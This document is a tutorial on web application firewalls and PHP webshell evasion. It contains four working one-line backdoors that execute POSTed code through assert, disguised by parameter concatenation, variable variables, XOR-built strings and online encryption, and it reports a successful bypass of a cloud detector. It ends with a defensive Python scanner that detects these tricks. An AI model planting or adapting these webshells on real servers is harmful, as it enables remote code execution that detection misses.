WAF bypassing mainly comes up in four stages of an engagement: information gathering, vulnerability discovery, vulnerability exploitation, and privilege control.
1. What is WAF?
Web Application Firewall (WAF): a widely accepted definition is "a product that protects web applications by enforcing a series of security policies on HTTP/HTTPS traffic."
WAFs can basically be divided into the following four types:
Software WAF
Installed on the server as software, it can access the files on the server, so it can detect whether a webshell is present, whether new files have been created, and so on.
Hardware WAF
Deployed in the network path as a hardware appliance, it supports several deployment modes. When connected inline (in series), malicious traffic can be blocked; in bypass (monitoring) mode, attacks are only logged, not blocked.
Cloud WAF
It generally works as a reverse proxy: once configured, requests for the website first pass through the WAF host, which filters the data before forwarding it to the origin server.
Web site built-in WAF
This is filtering built into the website itself, appearing directly in the application code, such as forced type casting of input parameters, sensitive-word checks on input parameters, and so on.
2. How to identify a WAF?
wafw00f identification tool: https://github.com/EnableSecurity/wafw00f
Image recognition: https://mp.weixin.qq.com/s/3uUZKryCufQ_HcuMc8ZgQQ
Other project scripting platforms.
3. What are the current common WAF products?
Reference: https://blog.csdn.net/w2sft/article/details/104533082/
① Hardware type
Hardware-based WAFs exist as independent hardware appliances and support several deployment modes (transparent bridge, bypass, reverse proxy, etc.) to protect back-end web applications. This is the most traditional type of WAF; in the surveyed enterprises it accounted for 35.2% of deployments. Compared with software WAFs, products of this type offer good performance, comprehensive features, and support for multiple deployment modes, but they are usually considerably more expensive. The WAFs of established domestic vendors such as NSFOCUS, Anheng, and Venustech all fall into this category.
② Software type
This type of WAF is implemented purely in software and is characterized by simple installation, ease of use, and low cost. Its shortcomings are also obvious: besides limited performance, there may be compatibility, security, and other issues. Representatives of this type include ModSecurity, Naxsi, ShareWAF, SafeDog, etc.
③ Cloud WAF
With the rapid development of cloud computing, cloud-based WAFs have become practical. In this survey their share even surpassed that of traditional hardware WAFs, taking first place at 39.4%. Alibaba Cloud, Tencent Cloud, Sangfor cloud WAF, and Imperva WAF are typical representatives of this type.
4. Demonstration: script backdoor detection-evasion variants: passing parameters, variable override, encrypted mutation, and XOR
1. Passing in parameters
Backdoor code:
<?php $a=$_GET['a']; $aa=$a.'ert'; $aa(base64_decode($_POST['x'])); ?>
Pass the parameter: a=ass
Use the Alibaba Cloud Webshell detection platform to detect script code
Address: https://ti.aliyun.com/#/webshell
Put in the script backdoor code:
Detected as malicious script:
2.Variable override
Backdoor code:
<?php $a='b'; $b='assert'; $$a(base64_decode($_POST['x'])); ?>
Use the Alibaba Cloud Webshell detection platform to detect script code
Put in the script backdoor code:
Detected as malicious script:
3. Exclusive OR (XOR) operation
Backdoor code:
<?php $a=('!'^'@').'ssert'; $a($_POST[x]); ?>
The result of the XOR operation ('!' ^ '@') is 'a':
Use the Alibaba Cloud Webshell detection platform to detect script code
Put in the script backdoor code:
Detected as malicious script:
4. Obfuscation/encryption variant
Upload the script backdoor code after encrypting it.
Online encryption tools:
Free Online Developer Tools – TOOLFK
PHP encryption – PHP online encryption platform
phpjiami – PHP online encryption tool (php source code encryption, zend encryption, ionCube9 encryption)
Script backdoor code:
<?php $a=$_GET['a']; $aa=$a.'ert'; $aa(base64_decode($_POST['x'])); ?>
Encrypt it online:
Address: https://www.phpjiami.com/phpjiami.html
A zip file is generated after encryption.
Unzip the file to get the encrypted file:
Use the Alibaba Cloud Webshell detection platform to detect script code
Put in the script backdoor file:
Detection is bypassed successfully:
Therefore, of the four variants, encryption/obfuscation is the one that most reliably evades this kind of signature-based script backdoor detection.
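The four variants above share a small set of traits a defender can look for in PHP source: a function name assembled from request input, variable variables (`$$a`), string constants built with XOR or concatenation, decoding of request data, and, for the encrypted variant, a source body that is mostly opaque high-entropy data. The scanner below is an added example written for this page, not code from the post or from any WAF or detection product. Its rule names, entropy threshold and taint heuristics are my own assumptions; the first three samples mirror the post's snippets and the "packed" sample is a constructed stand-in for an encrypted file. It constant-folds XOR and concatenation of literals before matching, so the `('!'^'@').'ssert'` trick resolves to `assert` just as the PHP engine would resolve it.

```python
import base64
import hashlib
import math
import re

# Functions that execute code or commands when they receive attacker-controlled input
DANGEROUS = {"assert", "eval", "system", "exec", "shell_exec", "passthru",
             "popen", "proc_open", "create_function"}
SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER|FILES)"
STR_LIT = r"(?:'(?:[^'\\]|\\.)*'|\"(?:[^\"\\]|\\.)*\")"
ENTROPY_THRESHOLD = 5.5      # bits per char; assumption: readable PHP is usually well below this
MIN_LEN_FOR_ENTROPY = 200    # assumption: ignore tiny files, one-liners are caught by other rules


def _unquote(lit):
    return lit[1:-1]


def _quote(s):
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def fold_xor_literals(src):
    """Constant-fold XOR of equal-length string literals, e.g. ('!'^'@') -> 'a'."""
    pat = re.compile(r"\(\s*(%s)\s*\^\s*(%s)\s*\)|(%s)\s*\^\s*(%s)" % ((STR_LIT,) * 4))

    def repl(m):
        a = _unquote(m.group(1) if m.group(1) is not None else m.group(3))
        b = _unquote(m.group(2) if m.group(2) is not None else m.group(4))
        if len(a) != len(b):
            return m.group(0)
        return _quote("".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b)))

    prev = None
    while prev != src:                  # repeat so chained XORs fold completely
        prev, src = src, pat.sub(repl, src)
    return src


def fold_concat_literals(src):
    """Join adjacent literal concatenations, e.g. 'a'.'ssert' -> 'assert'."""
    pat = re.compile(r"(%s)\s*\.\s*(%s)" % (STR_LIT, STR_LIT))
    prev = None
    while prev != src:
        prev, src = src, pat.sub(lambda m: _quote(_unquote(m.group(1)) + _unquote(m.group(2))), src)
    return src


def shannon_entropy(text):
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def analyze(src):
    """Return the sorted list of rule names that fire on one PHP source string."""
    findings = set()
    norm = fold_concat_literals(fold_xor_literals(src))
    if norm != src:
        findings.add("literal_folding_changed_source")   # strings were assembled from pieces
    consts, tainted = {}, set()
    # Single-pass taint tracking over simple "$var = expr;" assignments (heuristic, no real parser)
    for m in re.finditer(r"\$(\w+)\s*=(?!=)\s*([^;]+);", norm):
        var, rhs = m.group(1), m.group(2).strip()
        if re.fullmatch(STR_LIT, rhs):
            consts[var] = _unquote(rhs)
        if re.search(SUPERGLOBAL, rhs) or any(re.search(r"\$%s\b" % re.escape(t), rhs) for t in tainted):
            tainted.add(var)
    if re.search(r"\$\$\w+", norm):
        findings.add("variable_variable")
    # A variable used as the callee: "$x(...)" or "$$x(...)"
    for m in re.finditer(r"(\$\$?)(\w+)\s*\(", norm):
        sigil, name = m.groups()
        findings.add("dynamic_function_call")
        if name in tainted:
            findings.add("callee_from_request_input")
        target = consts.get(name)
        if sigil == "$$" and target is not None:
            target = consts.get(target)     # resolve $$a through $a = 'b'; $b = '...'
        if target in DANGEROUS:
            findings.add("resolved_callee_" + target)
    if re.search(r"(?:base64_decode|str_rot13|gzinflate|gzuncompress)\s*\(\s*" + SUPERGLOBAL, norm):
        findings.add("decoded_request_input")
    body = re.sub(r"\s+", "", src)
    if len(body) >= MIN_LEN_FOR_ENTROPY and shannon_entropy(body) > ENTROPY_THRESHOLD:
        findings.add("high_entropy_body")
    return sorted(findings)


def _constructed_packed_sample():
    # Constructed stand-in for an "encrypted" file: a large opaque blob, deterministic for reproducibility
    blob = base64.b64encode(b"".join(hashlib.sha256(bytes([i])).digest() for i in range(24))).decode()
    return "<?php /* packed by [placeholder tool] */ $__s=base64_decode('" + blob + "'); ?>"


# Constructed samples: the first three mirror the post's variants, the last is a benign control
SAMPLES = {
    "param_concat": "<?php $a=$_GET['a']; $aa=$a.'ert'; $aa(base64_decode($_POST['x'])); ?>",
    "var_override": "<?php $a='b'; $b='assert'; $$a(base64_decode($_POST['x'])); ?>",
    "xor_build": "<?php $a=('!'^'@').'ssert'; $a($_POST[x]); ?>",
    "packed": _constructed_packed_sample(),
    "benign": "<?php $name = htmlspecialchars($_GET['name'] ?? ''); echo 'Hello ' . $name; ?>",
}

if __name__ == "__main__":
    for label, src in SAMPLES.items():
        print(label, "->", analyze(src) or "clean")
```

The folding step is the important design choice: a signature for the literal string `assert` never sees it in the XOR variant, but normalizing the source first makes all three one-liners collapse onto the same `resolved_callee_assert` or `callee_from_request_input` finding. The entropy rule is a coarse net for the encrypted variant and should be paired with file-integrity monitoring of the web root rather than used alone, since minified or legitimately packed assets can also score high.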